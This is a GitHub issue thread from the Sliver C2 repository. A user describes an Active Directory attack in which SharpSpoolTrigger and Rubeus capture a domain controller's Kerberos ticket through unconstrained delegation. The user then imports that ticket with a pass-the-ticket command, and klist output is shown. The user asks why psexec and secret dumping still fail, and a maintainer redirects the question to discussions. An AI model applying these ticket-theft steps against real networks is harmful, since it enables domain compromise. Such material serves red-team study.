### ISSUE TITLE
Best way to use cached tickets

### ISSUE THREAD

**Issue by n3rada** [BishopFox/sliver#1626]
I'm sorry to open an issue on this point, but I haven't been able to find a suitable solution. I hope this issue will be useful for others.

I am running `sliver` with `Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df` on a Kali linux environment `Linux kali 6.6.9-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.9-1kali1 (2024-01-08) x86_64 GNU/Linux`.

## Typical Scenario
You have a session / beacon on a server named `WEB` which has `Unconstrained Delegation` with the `DC01`. After running `SharpSpoolTrigger` and retrieving (with difficulties due to the way `sliver` works for `Rubeus` monitoring) the desired ticket, I tried to import it with :
```shell
rubeus --in-process ptt /ticket:doIFDDCCBQigAwIBBaEDAgEWooIEFDCCBBBhggQM<snip>VqnERgPMjAyNDA0MTQyMjM2NDlaqA4bDElORklOSVRZLkNPTakhMB+gAwIBAqEYMBYbBmtyYnRndBsMSU5GSU5JVFkuQ09N
```

Then, I can confirm that it is imported with:
```shell
sliver (BIG_ATHLETE) > c2tc-klist

[*] Successfully executed c2tc-klist (coff-loader)
[*] Got output:

Cached Tickets: (1)

#0>     Client: DC01$ @ TEST.COM
        Server: krbtgt/TEST.COM @ TEST.COM
        KerbTicket Encryption Type: (18) AES256_CTS_HMAC_SHA1_96
        Ticket Flags: 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 4/7/2024 15:36:52
        End Time:   4/8/2024 1:36:49
        Renew Time: 4/14/2024 15:36:49
        Session Key Type: (18) AES256_CTS_HMAC_SHA1_96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
```

But I couldn't run an `psexec` or `sharpsecdump` on the target. What am I missing?

**Comment by rkervella** [comment]
Please use [discussions](https://github.com/BishopFox/sliver/discussions) for questions.
